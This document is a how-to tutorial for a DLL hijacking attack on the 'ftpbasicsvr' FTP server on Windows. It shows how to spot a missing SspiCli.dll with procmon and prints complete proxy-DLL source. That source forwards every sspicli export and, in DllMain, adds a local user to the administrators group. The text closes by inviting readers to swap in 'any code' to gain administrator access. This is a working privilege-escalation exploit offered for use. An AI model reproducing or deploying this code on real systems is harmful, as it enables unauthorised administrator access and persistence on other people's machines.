How to create a DLL Hijacking

This article describes how to implement a DLL hijacking attack. You need only three tools: procmon to identify the vulnerability, and Spartacus and Visual Studio for preparation.

In this example I used ftpbasicsvr to prepare a DLL for DLL hijacking.

Identify a vulnerability for DLL hijacking

At first you download procmon.

Add following filter.

1: Result contains "not found", then Include
2: Process Name contains ftpbasicsvr (or the program you want to attack)

Start the program “ftpbasicsvr” and search for any DLL which could not be found in the program path.

The following DLL was not found:

D:\fh-campus\cybersecurity\easyftpsvr-1.7.0.2\SspiCli.dll

Then I unchecked the first filter item to display the other messages.
sspicli.dll was then found in “C:\Windows\SysWOW64\sspicli.dll”. The loader searched the application directory before the system directory, which is why a DLL placed there is loaded instead of the Windows copy.

In the next step I created the source project for Microsoft Visual Studio with Spartacus.

The following file was created:

#pragma once

// Export forwarders generated by Spartacus for the proxy DLL: each /export
// directive re-exports a symbol of the genuine sspicli under the same name
// (and, presumably, its original ordinal — the ",@N" part) and forwards it to
// the real module at its absolute SysWOW64 path. A host that resolves imports
// by name or ordinal therefore still reaches the genuine implementation even
// though it loaded this DLL from its own directory.
#pragma comment(linker,"/export:AcceptSecurityContext=c:\\windows\\syswow64\\sspicli.AcceptSecurityContext,@4")
#pragma comment(linker,"/export:AcquireCredentialsHandleA=c:\\windows\\syswow64\\sspicli.AcquireCredentialsHandleA,@5")
#pragma comment(linker,"/export:AcquireCredentialsHandleW=c:\\windows\\syswow64\\sspicli.AcquireCredentialsHandleW,@6")
#pragma comment(linker,"/export:AddCredentialsA=c:\\windows\\syswow64\\sspicli.AddCredentialsA,@7")
#pragma comment(linker,"/export:AddCredentialsW=c:\\windows\\syswow64\\sspicli.AddCredentialsW,@8")
#pragma comment(linker,"/export:AddSecurityPackageA=c:\\windows\\syswow64\\sspicli.AddSecurityPackageA,@9")
#pragma comment(linker,"/export:AddSecurityPackageW=c:\\windows\\syswow64\\sspicli.AddSecurityPackageW,@10")
#pragma comment(linker,"/export:ApplyControlToken=c:\\windows\\syswow64\\sspicli.ApplyControlToken,@11")
#pragma comment(linker,"/export:ChangeAccountPasswordA=c:\\windows\\syswow64\\sspicli.ChangeAccountPasswordA,@12")
#pragma comment(linker,"/export:ChangeAccountPasswordW=c:\\windows\\syswow64\\sspicli.ChangeAccountPasswordW,@13")
#pragma comment(linker,"/export:CompleteAuthToken=c:\\windows\\syswow64\\sspicli.CompleteAuthToken,@14")
#pragma comment(linker,"/export:CredMarshalTargetInfo=c:\\windows\\syswow64\\sspicli.CredMarshalTargetInfo,@15")
#pragma comment(linker,"/export:CredUnmarshalTargetInfo=c:\\windows\\syswow64\\sspicli.CredUnmarshalTargetInfo,@16")
#pragma comment(linker,"/export:DecryptMessage=c:\\windows\\syswow64\\sspicli.DecryptMessage,@17")
#pragma comment(linker,"/export:DeleteSecurityContext=c:\\windows\\syswow64\\sspicli.DeleteSecurityContext,@18")
#pragma comment(linker,"/export:DeleteSecurityPackageA=c:\\windows\\syswow64\\sspicli.DeleteSecurityPackageA,@19")
#pragma comment(linker,"/export:DeleteSecurityPackageW=c:\\windows\\syswow64\\sspicli.DeleteSecurityPackageW,@20")
#pragma comment(linker,"/export:EncryptMessage=c:\\windows\\syswow64\\sspicli.EncryptMessage,@21")
#pragma comment(linker,"/export:EnumerateSecurityPackagesA=c:\\windows\\syswow64\\sspicli.EnumerateSecurityPackagesA,@22")
#pragma comment(linker,"/export:EnumerateSecurityPackagesW=c:\\windows\\syswow64\\sspicli.EnumerateSecurityPackagesW,@23")
#pragma comment(linker,"/export:ExportSecurityContext=c:\\windows\\syswow64\\sspicli.ExportSecurityContext,@24")
#pragma comment(linker,"/export:FreeContextBuffer=c:\\windows\\syswow64\\sspicli.FreeContextBuffer,@25")
#pragma comment(linker,"/export:FreeCredentialsHandle=c:\\windows\\syswow64\\sspicli.FreeCredentialsHandle,@26")
#pragma comment(linker,"/export:GetSecurityUserInfo=c:\\windows\\syswow64\\sspicli.GetSecurityUserInfo,@27")
#pragma comment(linker,"/export:GetUserNameExA=c:\\windows\\syswow64\\sspicli.GetUserNameExA,@28")
#pragma comment(linker,"/export:GetUserNameExW=c:\\windows\\syswow64\\sspicli.GetUserNameExW,@29")
#pragma comment(linker,"/export:ImpersonateSecurityContext=c:\\windows\\syswow64\\sspicli.ImpersonateSecurityContext,@30")
#pragma comment(linker,"/export:ImportSecurityContextA=c:\\windows\\syswow64\\sspicli.ImportSecurityContextA,@31")
#pragma comment(linker,"/export:ImportSecurityContextW=c:\\windows\\syswow64\\sspicli.ImportSecurityContextW,@32")
#pragma comment(linker,"/export:InitSecurityInterfaceA=c:\\windows\\syswow64\\sspicli.InitSecurityInterfaceA,@33")
#pragma comment(linker,"/export:InitSecurityInterfaceW=c:\\windows\\syswow64\\sspicli.InitSecurityInterfaceW,@34")
#pragma comment(linker,"/export:InitializeSecurityContextA=c:\\windows\\syswow64\\sspicli.InitializeSecurityContextA,@35")
#pragma comment(linker,"/export:InitializeSecurityContextW=c:\\windows\\syswow64\\sspicli.InitializeSecurityContextW,@36")
#pragma comment(linker,"/export:LogonUserExExW=c:\\windows\\syswow64\\sspicli.LogonUserExExW,@37")
#pragma comment(linker,"/export:LsaCallAuthenticationPackage=c:\\windows\\syswow64\\sspicli.LsaCallAuthenticationPackage,@38")
#pragma comment(linker,"/export:LsaConnectUntrusted=c:\\windows\\syswow64\\sspicli.LsaConnectUntrusted,@39")
#pragma comment(linker,"/export:LsaDeregisterLogonProcess=c:\\windows\\syswow64\\sspicli.LsaDeregisterLogonProcess,@40")
#pragma comment(linker,"/export:LsaEnumerateLogonSessions=c:\\windows\\syswow64\\sspicli.LsaEnumerateLogonSessions,@41")
#pragma comment(linker,"/export:LsaFreeReturnBuffer=c:\\windows\\syswow64\\sspicli.LsaFreeReturnBuffer,@42")
#pragma comment(linker,"/export:LsaGetLogonSessionData=c:\\windows\\syswow64\\sspicli.LsaGetLogonSessionData,@43")
#pragma comment(linker,"/export:LsaLogonUser=c:\\windows\\syswow64\\sspicli.LsaLogonUser,@44")
#pragma comment(linker,"/export:LsaLookupAuthenticationPackage=c:\\windows\\syswow64\\sspicli.LsaLookupAuthenticationPackage,@45")
#pragma comment(linker,"/export:LsaRegisterLogonProcess=c:\\windows\\syswow64\\sspicli.LsaRegisterLogonProcess,@46")
#pragma comment(linker,"/export:LsaRegisterPolicyChangeNotification=c:\\windows\\syswow64\\sspicli.LsaRegisterPolicyChangeNotification,@47")
#pragma comment(linker,"/export:LsaUnregisterPolicyChangeNotification=c:\\windows\\syswow64\\sspicli.LsaUnregisterPolicyChangeNotification,@48")
#pragma comment(linker,"/export:MakeSignature=c:\\windows\\syswow64\\sspicli.MakeSignature,@49")
#pragma comment(linker,"/export:QueryContextAttributesA=c:\\windows\\syswow64\\sspicli.QueryContextAttributesA,@50")
#pragma comment(linker,"/export:QueryContextAttributesExA=c:\\windows\\syswow64\\sspicli.QueryContextAttributesExA,@51")
#pragma comment(linker,"/export:QueryContextAttributesExW=c:\\windows\\syswow64\\sspicli.QueryContextAttributesExW,@52")
#pragma comment(linker,"/export:QueryContextAttributesW=c:\\windows\\syswow64\\sspicli.QueryContextAttributesW,@53")
#pragma comment(linker,"/export:QueryCredentialsAttributesA=c:\\windows\\syswow64\\sspicli.QueryCredentialsAttributesA,@54")
#pragma comment(linker,"/export:QueryCredentialsAttributesExA=c:\\windows\\syswow64\\sspicli.QueryCredentialsAttributesExA,@55")
#pragma comment(linker,"/export:QueryCredentialsAttributesExW=c:\\windows\\syswow64\\sspicli.QueryCredentialsAttributesExW,@56")
#pragma comment(linker,"/export:QueryCredentialsAttributesW=c:\\windows\\syswow64\\sspicli.QueryCredentialsAttributesW,@57")
#pragma comment(linker,"/export:QuerySecurityContextToken=c:\\windows\\syswow64\\sspicli.QuerySecurityContextToken,@58")
#pragma comment(linker,"/export:QuerySecurityPackageInfoA=c:\\windows\\syswow64\\sspicli.QuerySecurityPackageInfoA,@59")
#pragma comment(linker,"/export:QuerySecurityPackageInfoW=c:\\windows\\syswow64\\sspicli.QuerySecurityPackageInfoW,@60")
#pragma comment(linker,"/export:RevertSecurityContext=c:\\windows\\syswow64\\sspicli.RevertSecurityContext,@61")
#pragma comment(linker,"/export:SaslAcceptSecurityContext=c:\\windows\\syswow64\\sspicli.SaslAcceptSecurityContext,@62")
#pragma comment(linker,"/export:SaslEnumerateProfilesA=c:\\windows\\syswow64\\sspicli.SaslEnumerateProfilesA,@63")
#pragma comment(linker,"/export:SaslEnumerateProfilesW=c:\\windows\\syswow64\\sspicli.SaslEnumerateProfilesW,@64")
#pragma comment(linker,"/export:SaslGetContextOption=c:\\windows\\syswow64\\sspicli.SaslGetContextOption,@65")
#pragma comment(linker,"/export:SaslGetProfilePackageA=c:\\windows\\syswow64\\sspicli.SaslGetProfilePackageA,@66")
#pragma comment(linker,"/export:SaslGetProfilePackageW=c:\\windows\\syswow64\\sspicli.SaslGetProfilePackageW,@67")
#pragma comment(linker,"/export:SaslIdentifyPackageA=c:\\windows\\syswow64\\sspicli.SaslIdentifyPackageA,@68")
#pragma comment(linker,"/export:SaslIdentifyPackageW=c:\\windows\\syswow64\\sspicli.SaslIdentifyPackageW,@69")
#pragma comment(linker,"/export:SaslInitializeSecurityContextA=c:\\windows\\syswow64\\sspicli.SaslInitializeSecurityContextA,@70")
#pragma comment(linker,"/export:SaslInitializeSecurityContextW=c:\\windows\\syswow64\\sspicli.SaslInitializeSecurityContextW,@71")
#pragma comment(linker,"/export:SaslSetContextOption=c:\\windows\\syswow64\\sspicli.SaslSetContextOption,@72")
#pragma comment(linker,"/export:SealMessage=c:\\windows\\syswow64\\sspicli.SealMessage,@73")
#pragma comment(linker,"/export:SecCacheSspiPackages=c:\\windows\\syswow64\\sspicli.SecCacheSspiPackages,@74")
#pragma comment(linker,"/export:SecDeleteUserModeContext=c:\\windows\\syswow64\\sspicli.SecDeleteUserModeContext,@1")
#pragma comment(linker,"/export:SecInitUserModeContext=c:\\windows\\syswow64\\sspicli.SecInitUserModeContext,@2")
#pragma comment(linker,"/export:SeciAllocateAndSetCallFlags=c:\\windows\\syswow64\\sspicli.SeciAllocateAndSetCallFlags,@75")
#pragma comment(linker,"/export:SeciAllocateAndSetCallTarget=c:\\windows\\syswow64\\sspicli.SeciAllocateAndSetCallTarget,@76")
#pragma comment(linker,"/export:SeciAllocateAndSetIPAddress=c:\\windows\\syswow64\\sspicli.SeciAllocateAndSetIPAddress,@77")
#pragma comment(linker,"/export:SeciFreeCallContext=c:\\windows\\syswow64\\sspicli.SeciFreeCallContext,@78")
#pragma comment(linker,"/export:SeciIsProtectedUser=c:\\windows\\syswow64\\sspicli.SeciIsProtectedUser,@79")
#pragma comment(linker,"/export:SetContextAttributesA=c:\\windows\\syswow64\\sspicli.SetContextAttributesA,@80")
#pragma comment(linker,"/export:SetContextAttributesW=c:\\windows\\syswow64\\sspicli.SetContextAttributesW,@81")
#pragma comment(linker,"/export:SetCredentialsAttributesA=c:\\windows\\syswow64\\sspicli.SetCredentialsAttributesA,@82")
#pragma comment(linker,"/export:SetCredentialsAttributesW=c:\\windows\\syswow64\\sspicli.SetCredentialsAttributesW,@83")
#pragma comment(linker,"/export:SspiCompareAuthIdentities=c:\\windows\\syswow64\\sspicli.SspiCompareAuthIdentities,@84")
#pragma comment(linker,"/export:SspiCopyAuthIdentity=c:\\windows\\syswow64\\sspicli.SspiCopyAuthIdentity,@85")
#pragma comment(linker,"/export:SspiDecryptAuthIdentity=c:\\windows\\syswow64\\sspicli.SspiDecryptAuthIdentity,@86")
#pragma comment(linker,"/export:SspiDecryptAuthIdentityEx=c:\\windows\\syswow64\\sspicli.SspiDecryptAuthIdentityEx,@87")
#pragma comment(linker,"/export:SspiEncodeAuthIdentityAsStrings=c:\\windows\\syswow64\\sspicli.SspiEncodeAuthIdentityAsStrings,@88")
#pragma comment(linker,"/export:SspiEncodeStringsAsAuthIdentity=c:\\windows\\syswow64\\sspicli.SspiEncodeStringsAsAuthIdentity,@89")
#pragma comment(linker,"/export:SspiEncryptAuthIdentity=c:\\windows\\syswow64\\sspicli.SspiEncryptAuthIdentity,@90")
#pragma comment(linker,"/export:SspiEncryptAuthIdentityEx=c:\\windows\\syswow64\\sspicli.SspiEncryptAuthIdentityEx,@91")
#pragma comment(linker,"/export:SspiExcludePackage=c:\\windows\\syswow64\\sspicli.SspiExcludePackage,@92")
#pragma comment(linker,"/export:SspiFreeAuthIdentity=c:\\windows\\syswow64\\sspicli.SspiFreeAuthIdentity,@93")
#pragma comment(linker,"/export:SspiGetComputerNameForSPN=c:\\windows\\syswow64\\sspicli.SspiGetComputerNameForSPN,@94")
#pragma comment(linker,"/export:SspiGetTargetHostName=c:\\windows\\syswow64\\sspicli.SspiGetTargetHostName,@95")
#pragma comment(linker,"/export:SspiIsAuthIdentityEncrypted=c:\\windows\\syswow64\\sspicli.SspiIsAuthIdentityEncrypted,@96")
#pragma comment(linker,"/export:SspiLocalFree=c:\\windows\\syswow64\\sspicli.SspiLocalFree,@97")
#pragma comment(linker,"/export:SspiMarshalAuthIdentity=c:\\windows\\syswow64\\sspicli.SspiMarshalAuthIdentity,@98")
#pragma comment(linker,"/export:SspiPrepareForCredRead=c:\\windows\\syswow64\\sspicli.SspiPrepareForCredRead,@99")
#pragma comment(linker,"/export:SspiPrepareForCredWrite=c:\\windows\\syswow64\\sspicli.SspiPrepareForCredWrite,@100")
#pragma comment(linker,"/export:SspiSetChannelBindingFlags=c:\\windows\\syswow64\\sspicli.SspiSetChannelBindingFlags,@101")
#pragma comment(linker,"/export:SspiUnmarshalAuthIdentity=c:\\windows\\syswow64\\sspicli.SspiUnmarshalAuthIdentity,@102")
#pragma comment(linker,"/export:SspiUnmarshalAuthIdentityInternal=c:\\windows\\syswow64\\sspicli.SspiUnmarshalAuthIdentityInternal,@3")
#pragma comment(linker,"/export:SspiValidateAuthIdentity=c:\\windows\\syswow64\\sspicli.SspiValidateAuthIdentity,@103")
#pragma comment(linker,"/export:SspiZeroAuthIdentity=c:\\windows\\syswow64\\sspicli.SspiZeroAuthIdentity,@104")
#pragma comment(linker,"/export:UnsealMessage=c:\\windows\\syswow64\\sspicli.UnsealMessage,@105")
#pragma comment(linker,"/export:VerifySignature=c:\\windows\\syswow64\\sspicli.VerifySignature,@106")

#include <windows.h>
#include "ios"
#include "fstream"



// Remove this line if you aren't proxying any functions.
// Loads the genuine sspicli from the absolute SysWOW64 path (the copy procmon
// showed above) during this module's static initialisation, i.e. before
// DllMain runs. The handle is never checked for NULL and nothing else in this
// file reads it — DllMain's first parameter of the same name shadows it.
HMODULE hModule = LoadLibrary(L"c:\\windows\\syswow64\\sspicli.dll");

// Remove this function if you aren't proxying any functions.
// Appends one line of text to the proxy's log file. The path is relative, so
// the file lands in the host process's current working directory — an on-disk
// artifact of the proxy DLL having run.
VOID DebugToFile(LPCSTR szInput)
{
    static const char* const kLogFile = "spartacus-proxy-sspicli.log";
    std::ofstream out(kLogFile, std::ios_base::out | std::ios_base::app);
    out << szInput << "\n";
}

// Entry point the Windows loader calls once the host process has mapped this
// DLL. Because the host resolved "SspiCli.dll" from its own directory (the
// procmon NOT FOUND result above), this code runs inside the host process and
// inherits whatever token and privileges that process has.
//
// Note: the hModule parameter shadows the file-scope hModule initialised by
// LoadLibrary above; lpReserved is unused.
BOOL APIENTRY DllMain(HMODULE hModule, DWORD  ul_reason_for_call, LPVOID lpReserved)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
		// Runs at process attach, i.e. while the loader lock is held. system()
		// blocks until the spawned cmd.exe exits, and "/k" keeps that shell open
		// after the net command finishes, so the attach never completes until
		// the window is closed; ExitProcess(0) then terminates the host instead
		// of letting the FTP server start. The child cmd.exe/net.exe spawned from
		// the server process and the abrupt exit are the observable indicators.
		system("cmd.exe /k net localgroup administrators testuser /add");
		ExitProcess(0);
		// ExitProcess does not return, so the missing break above is moot.

    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

Build the DLL with the generated Visual Studio project file and place the DLL in the same directory as your application.

You can change and adapt your DLL with any code to get access to the FTP server as administrator.

Good luck.